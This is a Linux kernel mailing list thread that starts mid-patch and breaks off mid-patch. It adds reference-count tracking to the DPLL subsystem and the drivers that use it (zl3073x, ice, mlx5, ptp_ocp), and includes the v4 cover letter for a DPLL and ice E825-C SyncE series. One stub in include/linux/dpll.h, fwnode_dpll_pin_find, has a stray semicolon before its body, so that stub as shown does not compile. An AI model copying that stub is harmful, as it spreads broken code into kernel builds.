pin_idx); static void dpll_pin_prop_free(struct dpll_pin_properties *prop); -static void __dpll_pin_put(struct dpll_pin *pin) +static void __dpll_pin_put(struct dpll_pin *pin, dpll_tracker *tracker) { + dpll_pin_tracker_free(pin, tracker); if (refcount_dec_and_test(&pin->refcount)) { xa_erase(&dpll_pin_xa, pin->id); xa_destroy(&pin->dpll_refs); @@ -118,6 +155,7 @@ static void __dpll_pin_put(struct dpll_pin *pin) dpll_pin_prop_free(&pin->prop); fwnode_handle_put(pin->fwnode); dpll_pin_idx_free(pin->pin_idx); + ref_tracker_dir_exit(&pin->refcnt_tracker); kfree_rcu(pin, rcu); } } @@ -191,7 +229,7 @@ dpll_xa_ref_pin_add(struct xarray *xa_pins, struct dpll_pin *pin, reg->ops = ops; reg->priv = priv; reg->cookie = cookie; - __dpll_pin_hold(pin); + __dpll_pin_hold(pin, &reg->tracker); if (ref_exists) refcount_inc(&ref->refcount); list_add_tail(&reg->list, &ref->registration_list); @@ -214,7 +252,7 @@ static int dpll_xa_ref_pin_del(struct xarray *xa_pins, struct dpll_pin *pin, if (WARN_ON(!reg)) return -EINVAL; list_del(&reg->list); - __dpll_pin_put(pin); + __dpll_pin_put(pin, &reg->tracker); kfree(reg); if (refcount_dec_and_test(&ref->refcount)) { xa_erase(xa_pins, i); @@ -272,7 +310,7 @@ dpll_xa_ref_dpll_add(struct xarray *xa_dplls, struct dpll_device *dpll, reg->ops = ops; reg->priv = priv; reg->cookie = cookie; - __dpll_device_hold(dpll); + __dpll_device_hold(dpll, &reg->tracker); if (ref_exists) refcount_inc(&ref->refcount); list_add_tail(&reg->list, &ref->registration_list); @@ -295,7 +333,7 @@ dpll_xa_ref_dpll_del(struct xarray *xa_dplls, struct dpll_device *dpll, if (WARN_ON(!reg)) return; list_del(&reg->list); - __dpll_device_put(dpll); + __dpll_device_put(dpll, &reg->tracker); kfree(reg); if (refcount_dec_and_test(&ref->refcount)) { xa_erase(xa_dplls, i); @@ -337,6 +375,7 @@ dpll_device_alloc(const u64 clock_id, u32 device_idx, struct module *module) return ERR_PTR(ret); } xa_init_flags(&dpll->pin_refs, XA_FLAGS_ALLOC); + ref_tracker_dir_init(&dpll->refcnt_tracker, 128, "dpll_device"); return dpll; } @@ -346,6 +385,7 @@ dpll_device_alloc(const u64 clock_id, u32 device_idx, struct module *module) * @clock_id: clock_id of creator * @device_idx: idx given by device driver * @module: reference to registering module + * @tracker: tracking object for the acquired reference * * Get existing object of a dpll device, unique for given arguments. * Create new if doesn't exist yet. @@ -356,7 +396,8 @@ dpll_device_alloc(const u64 clock_id, u32 device_idx, struct module *module) * * ERR_PTR(X) - error */ struct dpll_device * -dpll_device_get(u64 clock_id, u32 device_idx, struct module *module) +dpll_device_get(u64 clock_id, u32 device_idx, struct module *module, + dpll_tracker *tracker) { struct dpll_device *dpll, *ret = NULL; unsigned long index; @@ -366,13 +407,17 @@ dpll_device_get(u64 clock_id, u32 device_idx, struct module *module) if (dpll->clock_id == clock_id && dpll->device_idx == device_idx && dpll->module == module) { - __dpll_device_hold(dpll); + __dpll_device_hold(dpll, tracker); ret = dpll; break; } } - if (!ret) + if (!ret) { ret = dpll_device_alloc(clock_id, device_idx, module); + if (!IS_ERR(ret)) + dpll_device_tracker_alloc(ret, tracker); + } + mutex_unlock(&dpll_lock); return ret; @@ -382,15 +427,16 @@ EXPORT_SYMBOL_GPL(dpll_device_get); /** * dpll_device_put - decrease the refcount and free memory if possible * @dpll: dpll_device struct pointer + * @tracker: tracking object for the acquired reference * * Context: Acquires a lock (dpll_lock) * Drop reference for a dpll device, if all references are gone, delete * dpll device object. */ -void dpll_device_put(struct dpll_device *dpll) +void dpll_device_put(struct dpll_device *dpll, dpll_tracker *tracker) { mutex_lock(&dpll_lock); - __dpll_device_put(dpll); + __dpll_device_put(dpll, tracker); mutex_unlock(&dpll_lock); } EXPORT_SYMBOL_GPL(dpll_device_put); @@ -452,7 +498,7 @@ int dpll_device_register(struct dpll_device *dpll, enum dpll_type type, reg->ops = ops; reg->priv = priv; dpll->type = type; - __dpll_device_hold(dpll); + __dpll_device_hold(dpll, &reg->tracker); first_registration = list_empty(&dpll->registration_list); list_add_tail(&reg->list, &dpll->registration_list); if (!first_registration) { @@ -492,7 +538,7 @@ void dpll_device_unregister(struct dpll_device *dpll, return; } list_del(&reg->list); - __dpll_device_put(dpll); + __dpll_device_put(dpll, &reg->tracker); kfree(reg); if (!list_empty(&dpll->registration_list)) { @@ -622,6 +668,7 @@ dpll_pin_alloc(u64 clock_id, u32 pin_idx, struct module *module, &dpll_pin_xa_id, GFP_KERNEL); if (ret < 0) goto err_xa_alloc; + ref_tracker_dir_init(&pin->refcnt_tracker, 128, "dpll_pin"); return pin; err_xa_alloc: xa_destroy(&pin->dpll_refs); @@ -683,6 +730,7 @@ EXPORT_SYMBOL_GPL(unregister_dpll_notifier); * @pin_idx: idx given by dev driver * @module: reference to registering module * @prop: dpll pin properties + * @tracker: tracking object for the acquired reference * * Get existing object of a pin (unique for given arguments) or create new * if doesn't exist yet. @@ -694,7 +742,7 @@ EXPORT_SYMBOL_GPL(unregister_dpll_notifier); */ struct dpll_pin * dpll_pin_get(u64 clock_id, u32 pin_idx, struct module *module, - const struct dpll_pin_properties *prop) + const struct dpll_pin_properties *prop, dpll_tracker *tracker) { struct dpll_pin *pos, *ret = NULL; unsigned long i; @@ -704,13 +752,16 @@ dpll_pin_get(u64 clock_id, u32 pin_idx, struct module *module, if (pos->clock_id == clock_id && pos->pin_idx == pin_idx && pos->module == module) { - __dpll_pin_hold(pos); + __dpll_pin_hold(pos, tracker); ret = pos; break; } } - if (!ret) + if (!ret) { ret = dpll_pin_alloc(clock_id, pin_idx, module, prop); + if (!IS_ERR(ret)) + dpll_pin_tracker_alloc(ret, tracker); + } mutex_unlock(&dpll_lock); return ret; @@ -720,15 +771,16 @@ EXPORT_SYMBOL_GPL(dpll_pin_get); /** * dpll_pin_put - decrease the refcount and free memory if possible * @pin: pointer to a pin to be put + * @tracker: tracking object for the acquired reference * * Drop reference for a pin, if all references are gone, delete pin object. * * Context: Acquires a lock (dpll_lock) */ -void dpll_pin_put(struct dpll_pin *pin) +void dpll_pin_put(struct dpll_pin *pin, dpll_tracker *tracker) { mutex_lock(&dpll_lock); - __dpll_pin_put(pin); + __dpll_pin_put(pin, tracker); mutex_unlock(&dpll_lock); } EXPORT_SYMBOL_GPL(dpll_pin_put); @@ -752,6 +804,7 @@ EXPORT_SYMBOL_GPL(dpll_pin_fwnode_set); /** * fwnode_dpll_pin_find - find dpll pin by firmware node reference * @fwnode: reference to firmware node + * @tracker: tracking object for the acquired reference * * Get existing object of a pin that is associated with given firmware node * reference. @@ -761,7 +814,8 @@ EXPORT_SYMBOL_GPL(dpll_pin_fwnode_set); * * valid dpll_pin pointer on success * * NULL when no such pin exists */ -struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode) +struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode, + dpll_tracker *tracker) { struct dpll_pin *pin, *ret = NULL; unsigned long index; @@ -769,7 +823,7 @@ struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode) mutex_lock(&dpll_lock); xa_for_each(&dpll_pin_xa, index, pin) { if (pin->fwnode == fwnode) { - __dpll_pin_hold(pin); + __dpll_pin_hold(pin, tracker); ret = pin; break; } diff --git a/drivers/dpll/dpll_core.h b/drivers/dpll/dpll_core.h index b7b4bb251f739..71ac88ef20172 100644 --- a/drivers/dpll/dpll_core.h +++ b/drivers/dpll/dpll_core.h @@ -10,6 +10,7 @@ #include <linux/dpll.h> #include <linux/list.h> #include <linux/refcount.h> +#include <linux/ref_tracker.h> #include "dpll_nl.h" #define DPLL_REGISTERED XA_MARK_1 @@ -23,6 +24,7 @@ * @type: type of a dpll * @pin_refs: stores pins registered within a dpll * @refcount: refcount + * @refcnt_tracker: ref_tracker directory for debugging reference leaks * @registration_list: list of registered ops and priv data of dpll owners **/ struct dpll_device { @@ -33,6 +35,7 @@ struct dpll_device { enum dpll_type type; struct xarray pin_refs; refcount_t refcount; + struct ref_tracker_dir refcnt_tracker; struct list_head registration_list; }; @@ -48,6 +51,7 @@ struct dpll_device { * @ref_sync_pins: hold references to pins for Reference SYNC feature * @prop: pin properties copied from the registerer * @refcount: refcount + * @refcnt_tracker: ref_tracker directory for debugging reference leaks * @rcu: rcu_head for kfree_rcu() **/ struct dpll_pin { @@ -61,6 +65,7 @@ struct dpll_pin { struct xarray ref_sync_pins; struct dpll_pin_properties prop; refcount_t refcount; + struct ref_tracker_dir refcnt_tracker; struct rcu_head rcu; }; diff --git a/drivers/dpll/zl3073x/dpll.c b/drivers/dpll/zl3073x/dpll.c index 9eed21088adac..8788bcab7ec53 100644 --- a/drivers/dpll/zl3073x/dpll.c +++ b/drivers/dpll/zl3073x/dpll.c @@ -1480,7 +1480,7 @@ zl3073x_dpll_pin_register(struct zl3073x_dpll_pin *pin, u32 index) /* Create or get existing DPLL pin */ pin->dpll_pin = dpll_pin_get(zldpll->dev->clock_id, index, THIS_MODULE, - &props->dpll_props); + &props->dpll_props, NULL); if (IS_ERR(pin->dpll_pin)) { rc = PTR_ERR(pin->dpll_pin); goto err_pin_get; @@ -1503,7 +1503,7 @@ zl3073x_dpll_pin_register(struct zl3073x_dpll_pin *pin, u32 index) return 0; err_register: - dpll_pin_put(pin->dpll_pin); + dpll_pin_put(pin->dpll_pin, NULL); err_prio_get: pin->dpll_pin = NULL; err_pin_get: @@ -1534,7 +1534,7 @@ zl3073x_dpll_pin_unregister(struct zl3073x_dpll_pin *pin) /* Unregister the pin */ dpll_pin_unregister(zldpll->dpll_dev, pin->dpll_pin, ops, pin); - dpll_pin_put(pin->dpll_pin); + dpll_pin_put(pin->dpll_pin, NULL); pin->dpll_pin = NULL; } @@ -1708,7 +1708,7 @@ zl3073x_dpll_device_register(struct zl3073x_dpll *zldpll) dpll_mode_refsel); zldpll->dpll_dev = dpll_device_get(zldev->clock_id, zldpll->id, - THIS_MODULE); + THIS_MODULE, NULL); if (IS_ERR(zldpll->dpll_dev)) { rc = PTR_ERR(zldpll->dpll_dev); zldpll->dpll_dev = NULL; @@ -1720,7 +1720,7 @@ zl3073x_dpll_device_register(struct zl3073x_dpll *zldpll) zl3073x_prop_dpll_type_get(zldev, zldpll->id), &zl3073x_dpll_device_ops, zldpll); if (rc) { - dpll_device_put(zldpll->dpll_dev); + dpll_device_put(zldpll->dpll_dev, NULL); zldpll->dpll_dev = NULL; } @@ -1743,7 +1743,7 @@ zl3073x_dpll_device_unregister(struct zl3073x_dpll *zldpll) dpll_device_unregister(zldpll->dpll_dev, &zl3073x_dpll_device_ops, zldpll); - dpll_device_put(zldpll->dpll_dev); + dpll_device_put(zldpll->dpll_dev, NULL); zldpll->dpll_dev = NULL; } diff --git a/drivers/net/ethernet/intel/ice/ice_dpll.c b/drivers/net/ethernet/intel/ice/ice_dpll.c index 53b54e395a2ed..64b7b045ecd58 100644 --- a/drivers/net/ethernet/intel/ice/ice_dpll.c +++ b/drivers/net/ethernet/intel/ice/ice_dpll.c @@ -2814,7 +2814,7 @@ static void ice_dpll_release_pins(struct ice_dpll_pin *pins, int count) int i; for (i = 0; i < count; i++) - dpll_pin_put(pins[i].pin); + dpll_pin_put(pins[i].pin, NULL); } /** @@ -2840,7 +2840,7 @@ ice_dpll_get_pins(struct ice_pf *pf, struct ice_dpll_pin *pins, for (i = 0; i < count; i++) { pins[i].pin = dpll_pin_get(clock_id, i + start_idx, THIS_MODULE, - &pins[i].prop); + &pins[i].prop, NULL); if (IS_ERR(pins[i].pin)) { ret = PTR_ERR(pins[i].pin); goto release_pins; @@ -2851,7 +2851,7 @@ ice_dpll_get_pins(struct ice_pf *pf, struct ice_dpll_pin *pins, release_pins: while (--i >= 0) - dpll_pin_put(pins[i].pin); + dpll_pin_put(pins[i].pin, NULL); return ret; } @@ -3037,7 +3037,7 @@ static void ice_dpll_deinit_rclk_pin(struct ice_pf *pf) if (WARN_ON_ONCE(!vsi || !vsi->netdev)) return; dpll_netdev_pin_clear(vsi->netdev); - dpll_pin_put(rclk->pin); + dpll_pin_put(rclk->pin, NULL); } /** @@ -3247,7 +3247,7 @@ ice_dpll_deinit_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu) { if (cgu) dpll_device_unregister(d->dpll, d->ops, d); - dpll_device_put(d->dpll); + dpll_device_put(d->dpll, NULL); } /** @@ -3271,7 +3271,7 @@ ice_dpll_init_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu, u64 clock_id = pf->dplls.clock_id; int ret; - d->dpll = dpll_device_get(clock_id, d->dpll_idx, THIS_MODULE); + d->dpll = dpll_device_get(clock_id, d->dpll_idx, THIS_MODULE, NULL); if (IS_ERR(d->dpll)) { ret = PTR_ERR(d->dpll); dev_err(ice_pf_to_dev(pf), @@ -3287,7 +3287,7 @@ ice_dpll_init_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu, ice_dpll_update_state(pf, d, true); ret = dpll_device_register(d->dpll, type, ops, d); if (ret) { - dpll_device_put(d->dpll); + dpll_device_put(d->dpll, NULL); return ret; } d->ops = ops; diff --git a/drivers/net/ethernet/mellanox/mlx5/core/dpll.c b/drivers/net/ethernet/mellanox/mlx5/core/dpll.c index 3ea8a1766ae28..541d83e5d7183 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/dpll.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/dpll.c @@ -438,7 +438,7 @@ static int mlx5_dpll_probe(struct auxiliary_device *adev, auxiliary_set_drvdata(adev, mdpll); /* Multiple mdev instances might share one DPLL device. */ - mdpll->dpll = dpll_device_get(clock_id, 0, THIS_MODULE); + mdpll->dpll = dpll_device_get(clock_id, 0, THIS_MODULE, NULL); if (IS_ERR(mdpll->dpll)) { err = PTR_ERR(mdpll->dpll); goto err_free_mdpll; @@ -451,7 +451,8 @@ static int mlx5_dpll_probe(struct auxiliary_device *adev, /* Multiple mdev instances might share one DPLL pin. */ mdpll->dpll_pin = dpll_pin_get(clock_id, mlx5_get_dev_index(mdev), - THIS_MODULE, &mlx5_dpll_pin_properties); + THIS_MODULE, &mlx5_dpll_pin_properties, + NULL); if (IS_ERR(mdpll->dpll_pin)) { err = PTR_ERR(mdpll->dpll_pin); goto err_unregister_dpll_device; @@ -479,11 +480,11 @@ static int mlx5_dpll_probe(struct auxiliary_device *adev, dpll_pin_unregister(mdpll->dpll, mdpll->dpll_pin, &mlx5_dpll_pins_ops, mdpll); err_put_dpll_pin: - dpll_pin_put(mdpll->dpll_pin); + dpll_pin_put(mdpll->dpll_pin, NULL); err_unregister_dpll_device: dpll_device_unregister(mdpll->dpll, &mlx5_dpll_device_ops, mdpll); err_put_dpll_device: - dpll_device_put(mdpll->dpll); + dpll_device_put(mdpll->dpll, NULL); err_free_mdpll: kfree(mdpll); return err; @@ -499,9 +500,9 @@ static void mlx5_dpll_remove(struct auxiliary_device *adev) destroy_workqueue(mdpll->wq); dpll_pin_unregister(mdpll->dpll, mdpll->dpll_pin, &mlx5_dpll_pins_ops, mdpll); - dpll_pin_put(mdpll->dpll_pin); + dpll_pin_put(mdpll->dpll_pin, NULL); dpll_device_unregister(mdpll->dpll, &mlx5_dpll_device_ops, mdpll); - dpll_device_put(mdpll->dpll); + dpll_device_put(mdpll->dpll, NULL); kfree(mdpll); mlx5_dpll_synce_status_set(mdev, diff --git a/drivers/ptp/ptp_ocp.c b/drivers/ptp/ptp_ocp.c index 65fe05cac8c42..f39b3966b3e8c 100644 --- a/drivers/ptp/ptp_ocp.c +++ b/drivers/ptp/ptp_ocp.c @@ -4788,7 +4788,7 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) devlink_register(devlink); clkid = pci_get_dsn(pdev); - bp->dpll = dpll_device_get(clkid, 0, THIS_MODULE); + bp->dpll = dpll_device_get(clkid, 0, THIS_MODULE, NULL); if (IS_ERR(bp->dpll)) { err = PTR_ERR(bp->dpll); dev_err(&pdev->dev, "dpll_device_alloc failed\n"); @@ -4800,7 +4800,8 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) goto out; for (i = 0; i < OCP_SMA_NUM; i++) { - bp->sma[i].dpll_pin = dpll_pin_get(clkid, i, THIS_MODULE, &bp->sma[i].dpll_prop); + bp->sma[i].dpll_pin = dpll_pin_get(clkid, i, THIS_MODULE, + &bp->sma[i].dpll_prop, NULL); if (IS_ERR(bp->sma[i].dpll_pin)) { err = PTR_ERR(bp->sma[i].dpll_pin); goto out_dpll; @@ -4809,7 +4810,7 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) err = dpll_pin_register(bp->dpll, bp->sma[i].dpll_pin, &dpll_pins_ops, &bp->sma[i]); if (err) { - dpll_pin_put(bp->sma[i].dpll_pin); + dpll_pin_put(bp->sma[i].dpll_pin, NULL); goto out_dpll; } } @@ -4819,9 +4820,9 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) out_dpll: while (i--) { dpll_pin_unregister(bp->dpll, bp->sma[i].dpll_pin, &dpll_pins_ops, &bp->sma[i]); - dpll_pin_put(bp->sma[i].dpll_pin); + dpll_pin_put(bp->sma[i].dpll_pin, NULL); } - dpll_device_put(bp->dpll); + dpll_device_put(bp->dpll, NULL); out: ptp_ocp_detach(bp); out_disable: @@ -4842,11 +4843,11 @@ ptp_ocp_remove(struct pci_dev *pdev) for (i = 0; i < OCP_SMA_NUM; i++) { if (bp->sma[i].dpll_pin) { dpll_pin_unregister(bp->dpll, bp->sma[i].dpll_pin, &dpll_pins_ops, &bp->sma[i]); - dpll_pin_put(bp->sma[i].dpll_pin); + dpll_pin_put(bp->sma[i].dpll_pin, NULL); } } dpll_device_unregister(bp->dpll, &dpll_ops, bp); - dpll_device_put(bp->dpll); + dpll_device_put(bp->dpll, NULL); devlink_unregister(devlink); ptp_ocp_detach(bp); pci_disable_device(pdev); diff --git a/include/linux/dpll.h b/include/linux/dpll.h index 8fff048131f1d..5c80cdab0c180 100644 --- a/include/linux/dpll.h +++ b/include/linux/dpll.h @@ -18,6 +18,7 @@ struct dpll_device; struct dpll_pin; struct dpll_pin_esync; struct fwnode_handle; +struct ref_tracker; struct dpll_device_ops { int (*mode_get)(const struct dpll_device *dpll, void *dpll_priv, @@ -173,6 +174,12 @@ struct dpll_pin_properties { u32 phase_gran; }; +#ifdef CONFIG_DPLL_REFCNT_TRACKER +typedef struct ref_tracker *dpll_tracker; +#else +typedef struct {} dpll_tracker; +#endif + #define DPLL_DEVICE_CREATED 1 #define DPLL_DEVICE_DELETED 2 #define DPLL_DEVICE_CHANGED 3 @@ -205,7 +212,8 @@ size_t dpll_netdev_pin_handle_size(const struct net_device *dev); int dpll_netdev_add_pin_handle(struct sk_buff *msg, const struct net_device *dev); -struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode); +struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode, + dpll_tracker *tracker); #else static inline void dpll_netdev_pin_set(struct net_device *dev, struct dpll_pin *dpll_pin) { } @@ -223,16 +231,17 @@ dpll_netdev_add_pin_handle(struct sk_buff *msg, const struct net_device *dev) } static inline struct dpll_pin * -fwnode_dpll_pin_find(struct fwnode_handle *fwnode) +fwnode_dpll_pin_find(struct fwnode_handle *fwnode, dpll_tracker *tracker); { return NULL; } #endif struct dpll_device * -dpll_device_get(u64 clock_id, u32 dev_driver_id, struct module *module); +dpll_device_get(u64 clock_id, u32 dev_driver_id, struct module *module, + dpll_tracker *tracker); -void dpll_device_put(struct dpll_device *dpll); +void dpll_device_put(struct dpll_device *dpll, dpll_tracker *tracker); int dpll_device_register(struct dpll_device *dpll, enum dpll_type type, const struct dpll_device_ops *ops, void *priv); @@ -244,7 +253,7 @@ void dpll_device_unregister(struct dpll_device *dpll, struct dpll_pin * dpll_pin_get(u64 clock_id, u32 dev_driver_id, struct module *module, - const struct dpll_pin_properties *prop); + const struct dpll_pin_properties *prop, dpll_tracker *tracker); int dpll_pin_register(struct dpll_device *dpll, struct dpll_pin *pin, const struct dpll_pin_ops *ops, void *priv); @@ -252,7 +261,7 @@ int dpll_pin_register(struct dpll_device *dpll, struct dpll_pin *pin, void dpll_pin_unregister(struct dpll_device *dpll, struct dpll_pin *pin, const struct dpll_pin_ops *ops, void *priv); -void dpll_pin_put(struct dpll_pin *pin); +void dpll_pin_put(struct dpll_pin *pin, dpll_tracker *tracker); void dpll_pin_fwnode_set(struct dpll_pin *pin, struct fwnode_handle *fwnode); -- 2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:36 +0100", "thread_id": "20260202171638.17427-4-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
This series introduces Synchronous Ethernet (SyncE) support for the Intel E825-C Ethernet controller. Unlike previous generations where DPLL connections were implicitly assumed, the E825-C architecture relies on the platform firmware (ACPI) to describe the physical connections between the Ethernet controller and external DPLLs (such as the ZL3073x). To accommodate this, the series extends the DPLL subsystem to support firmware node (fwnode) associations, asynchronous discovery via notifiers, and dynamic pin management. Additionally, a significant refactor of the DPLL reference counting logic is included to ensure robustness and debuggability. DPLL Core Extensions: * Firmware Node Association: Pins can now be associated with a struct fwnode_handle after allocation via dpll_pin_fwnode_set(). This allows drivers to link pin objects with their corresponding DT/ACPI nodes. * Asynchronous Notifiers: A raw notifier chain is added to the DPLL core. This allows the Ethernet driver to subscribe to events and react when the platform DPLL driver registers the parent pins, resolving probe ordering dependencies. * Dynamic Indexing: Drivers can now request DPLL_PIN_IDX_UNSPEC to have the core automatically allocate a unique pin index. Reference Counting & Debugging: * Refactor: The reference counting logic in the core is consolidated. Internal list management helpers now automatically handle hold/put operations, removing fragile open-coded logic in the registration paths. * Reference Tracking: A new Kconfig option DPLL_REFCNT_TRACKER is added. This allows developers to instrument and debug reference leaks by recording stack traces for every get/put operation. Driver Updates: * zl3073x: Updated to associate pins with fwnode handles using the new setter and support the 'mux' pin type. * ice: Implements the E825-C specific hardware configuration for SyncE (CGU registers). It utilizes the new notifier and fwnode APIs to dynamically discover and attach to the platform DPLLs. Patch Summary: Patch 1: DPLL Core (fwnode association). Patch 2: Driver zl3073x (Set fwnode). Patch 3-4: DPLL Core (Notifiers and dynamic IDs). Patch 5: Driver zl3073x (Mux type). Patch 6: DPLL Core (Refcount refactor). Patch 7-8: Refcount tracking infrastructure and driver updates. Patch 9: Driver ice (E825-C SyncE logic). Changes in v4: * Fixed documentation and function stub issues found by AI Arkadiusz Kubalewski (1): ice: dpll: Support E825-C SyncE and dynamic pin discovery Ivan Vecera (7): dpll: Allow associating dpll pin with a firmware node dpll: zl3073x: Associate pin with fwnode handle dpll: Support dynamic pin index allocation dpll: zl3073x: Add support for mux pin type dpll: Enhance and consolidate reference counting logic dpll: Add reference count tracking support drivers: Add support for DPLL reference count tracking Petr Oros (1): dpll: Add notifier chain for dpll events drivers/dpll/Kconfig | 15 + drivers/dpll/dpll_core.c | 288 ++++++- drivers/dpll/dpll_core.h | 11 + drivers/dpll/dpll_netlink.c | 6 + drivers/dpll/zl3073x/dpll.c | 15 +- drivers/dpll/zl3073x/dpll.h | 2 + drivers/dpll/zl3073x/prop.c | 2 + drivers/net/ethernet/intel/ice/ice_dpll.c | 755 +++++++++++++++--- drivers/net/ethernet/intel/ice/ice_dpll.h | 30 + drivers/net/ethernet/intel/ice/ice_lib.c | 3 + drivers/net/ethernet/intel/ice/ice_ptp.c | 32 + drivers/net/ethernet/intel/ice/ice_ptp_hw.c | 9 +- drivers/net/ethernet/intel/ice/ice_tspll.c | 217 +++++ drivers/net/ethernet/intel/ice/ice_tspll.h | 13 +- drivers/net/ethernet/intel/ice/ice_type.h | 6 + .../net/ethernet/mellanox/mlx5/core/dpll.c | 16 +- drivers/ptp/ptp_ocp.c | 18 +- include/linux/dpll.h | 59 +- 18 files changed, 1347 insertions(+), 150 deletions(-) -- 2.52.0
Update existing DPLL drivers to utilize the DPLL reference count tracking infrastructure. Add dpll_tracker fields to the drivers' internal device and pin structures. Pass pointers to these trackers when calling dpll_device_get/put() and dpll_pin_get/put(). This allows developers to inspect the specific references held by this driver via debugfs when CONFIG_DPLL_REFCNT_TRACKER is enabled, aiding in the debugging of resource leaks. Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com> Signed-off-by: Ivan Vecera <ivecera@redhat.com> --- drivers/dpll/zl3073x/dpll.c | 14 ++++++++------ drivers/dpll/zl3073x/dpll.h | 2 ++ drivers/net/ethernet/intel/ice/ice_dpll.c | 15 ++++++++------- drivers/net/ethernet/intel/ice/ice_dpll.h | 4 ++++ drivers/net/ethernet/mellanox/mlx5/core/dpll.c | 15 +++++++++------ drivers/ptp/ptp_ocp.c | 17 ++++++++++------- 6 files changed, 41 insertions(+), 26 deletions(-) diff --git a/drivers/dpll/zl3073x/dpll.c b/drivers/dpll/zl3073x/dpll.c index 8788bcab7ec53..a99d143a7acde 100644 --- a/drivers/dpll/zl3073x/dpll.c +++ b/drivers/dpll/zl3073x/dpll.c @@ -29,6 +29,7 @@ * @list: this DPLL pin list entry * @dpll: DPLL the pin is registered to * @dpll_pin: pointer to registered dpll_pin + * @tracker: tracking object for the acquired reference * @label: package label * @dir: pin direction * @id: pin id @@ -44,6 +45,7 @@ struct zl3073x_dpll_pin { struct list_head list; struct zl3073x_dpll *dpll; struct dpll_pin *dpll_pin; + dpll_tracker tracker; char label[8]; enum dpll_pin_direction dir; u8 id; @@ -1480,7 +1482,7 @@ zl3073x_dpll_pin_register(struct zl3073x_dpll_pin *pin, u32 index) /* Create or get existing DPLL pin */ pin->dpll_pin = dpll_pin_get(zldpll->dev->clock_id, index, THIS_MODULE, - &props->dpll_props, NULL); + &props->dpll_props, &pin->tracker); if (IS_ERR(pin->dpll_pin)) { rc = PTR_ERR(pin->dpll_pin); goto err_pin_get; @@ -1503,7 +1505,7 @@ zl3073x_dpll_pin_register(struct zl3073x_dpll_pin *pin, u32 index) return 0; err_register: - dpll_pin_put(pin->dpll_pin, NULL); + dpll_pin_put(pin->dpll_pin, &pin->tracker); err_prio_get: pin->dpll_pin = NULL; err_pin_get: @@ -1534,7 +1536,7 @@ zl3073x_dpll_pin_unregister(struct zl3073x_dpll_pin *pin) /* Unregister the pin */ dpll_pin_unregister(zldpll->dpll_dev, pin->dpll_pin, ops, pin); - dpll_pin_put(pin->dpll_pin, NULL); + dpll_pin_put(pin->dpll_pin, &pin->tracker); pin->dpll_pin = NULL; } @@ -1708,7 +1710,7 @@ zl3073x_dpll_device_register(struct zl3073x_dpll *zldpll) dpll_mode_refsel); zldpll->dpll_dev = dpll_device_get(zldev->clock_id, zldpll->id, - THIS_MODULE, NULL); + THIS_MODULE, &zldpll->tracker); if (IS_ERR(zldpll->dpll_dev)) { rc = PTR_ERR(zldpll->dpll_dev); zldpll->dpll_dev = NULL; @@ -1720,7 +1722,7 @@ zl3073x_dpll_device_register(struct zl3073x_dpll *zldpll) zl3073x_prop_dpll_type_get(zldev, zldpll->id), &zl3073x_dpll_device_ops, zldpll); if (rc) { - dpll_device_put(zldpll->dpll_dev, NULL); + dpll_device_put(zldpll->dpll_dev, &zldpll->tracker); zldpll->dpll_dev = NULL; } @@ -1743,7 +1745,7 @@ zl3073x_dpll_device_unregister(struct zl3073x_dpll *zldpll) dpll_device_unregister(zldpll->dpll_dev, &zl3073x_dpll_device_ops, zldpll); - dpll_device_put(zldpll->dpll_dev, NULL); + dpll_device_put(zldpll->dpll_dev, &zldpll->tracker); zldpll->dpll_dev = NULL; } diff --git a/drivers/dpll/zl3073x/dpll.h b/drivers/dpll/zl3073x/dpll.h index e8c39b44b356c..c65c798c37927 100644 --- a/drivers/dpll/zl3073x/dpll.h +++ b/drivers/dpll/zl3073x/dpll.h @@ -18,6 +18,7 @@ * @check_count: periodic check counter * @phase_monitor: is phase offset monitor enabled * @dpll_dev: pointer to registered DPLL device + * @tracker: tracking object for the acquired reference * @lock_status: last saved DPLL lock status * @pins: list of pins * @change_work: device change notification work @@ -31,6 +32,7 @@ struct zl3073x_dpll { u8 check_count; bool phase_monitor; struct dpll_device *dpll_dev; + dpll_tracker tracker; enum dpll_lock_status lock_status; struct list_head pins; struct work_struct change_work; diff --git a/drivers/net/ethernet/intel/ice/ice_dpll.c b/drivers/net/ethernet/intel/ice/ice_dpll.c index 64b7b045ecd58..4eca62688d834 100644 --- a/drivers/net/ethernet/intel/ice/ice_dpll.c +++ b/drivers/net/ethernet/intel/ice/ice_dpll.c @@ -2814,7 +2814,7 @@ static void ice_dpll_release_pins(struct ice_dpll_pin *pins, int count) int i; for (i = 0; i < count; i++) - dpll_pin_put(pins[i].pin, NULL); + dpll_pin_put(pins[i].pin, &pins[i].tracker); } /** @@ -2840,7 +2840,7 @@ ice_dpll_get_pins(struct ice_pf *pf, struct ice_dpll_pin *pins, for (i = 0; i < count; i++) { pins[i].pin = dpll_pin_get(clock_id, i + start_idx, THIS_MODULE, - &pins[i].prop, NULL); + &pins[i].prop, &pins[i].tracker); if (IS_ERR(pins[i].pin)) { ret = PTR_ERR(pins[i].pin); goto release_pins; @@ -2851,7 +2851,7 @@ ice_dpll_get_pins(struct ice_pf *pf, struct ice_dpll_pin *pins, release_pins: while (--i >= 0) - dpll_pin_put(pins[i].pin, NULL); + dpll_pin_put(pins[i].pin, &pins[i].tracker); return ret; } @@ -3037,7 +3037,7 @@ static void ice_dpll_deinit_rclk_pin(struct ice_pf *pf) if (WARN_ON_ONCE(!vsi || !vsi->netdev)) return; dpll_netdev_pin_clear(vsi->netdev); - 